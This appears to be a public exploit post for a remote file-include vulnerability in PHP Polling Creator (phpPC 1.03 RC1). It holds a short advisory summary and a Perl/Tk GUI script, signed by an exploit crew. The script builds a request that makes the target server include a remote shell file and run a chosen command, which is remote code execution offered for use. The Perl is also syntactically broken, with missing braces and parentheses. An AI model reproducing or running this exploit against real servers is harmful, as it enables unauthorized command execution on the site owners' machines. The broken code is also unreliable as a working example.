PHP Polling Creator is affected by a remote file-include vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
#- - - [xp10 TEAM THE BEST POLISH TEAM] - -
#- phpPC <= 1.03 RC1 Remote File Include Exploit
#- [Script name: phppc
#- [Script site:
#- Find by: The-wolf-ksa (wolf)
#- wolf TEAM
#- Contact:
#- or
#- Special Greetz: ;-)
#- Ema:
#- my friends
#- Greetz for all users wolf TEAM IRC Channel !!
#!@ Przyjazni nie da sie zamienic na marne korzysci @!
#- Z Dedykacja dla osoby,
#- bez ktorej nie mogl bym zyc...
#- K.C:* J.M (wolf)
# Example: http://[site]/phppc/lib/
use Tk;
use Tk::DialogBox;
use LWP::UserAgent;
$mw = new MainWindow(title => "wolf TEAM :: phpPC 1.03 Remote File Include Exploit :: by the-wolf-ksa ;-) " );
$mw->geometry ( '500x300' ) ;
$mw->Label(-text => 'phpPC 1.03 RC1 Remote File Include Exploit by the-wolf-ksa', -font => '{Verdana} 7 bold',-foreground=>'blue')->pack();
$mw->Label(-text => '')->pack();
$fleft=$mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ;
$fright=$mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ;
$url = '[path]/lib/';
$shell_path = 'http://shell.txt?';
$cmd = 'ls -la';
$fleft->Label ( -text => 'Script Path: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$url) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'Shell Path: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$shell_path) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'CMD: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$cmd) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fright->Label( -text => ' ')->pack();
$fleft->Label( -text => ' ')->pack();
$fright->Button(-text => 'Exploit Include Vulnerability',
-relief => "groove",
-width => '30',
-font => '{Verdana} 8 bold',
-activeforeground => 'red',
-command => \&akcja
$fright->Label( -text => ' ')->pack();
$fright->Label( -text => 'Exploit coded by the-wolf-ksa', -font => '{Verdana} 7')->pack();
$fright->Label( -text => 'wolf TEAM :: The Best Polish Team', -font => '{Verdana} 7')->pack();
$fright->Label( -text => '', -font => '{Verdana} 7')->pack();
sub akcja()
$InfoWindow=$mw->DialogBox(-title => 'wolf TEAM :: Exploit by the-wolf-ksa ;-) ', -buttons => ["OK"]);
$InfoWindow->add('Label', -text => ' for help #wolfteam', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => 'wolf TEAM SITE:', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => 'Greetz For my friends ;-)', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
system("start $url$shell_path$cmd");
# ]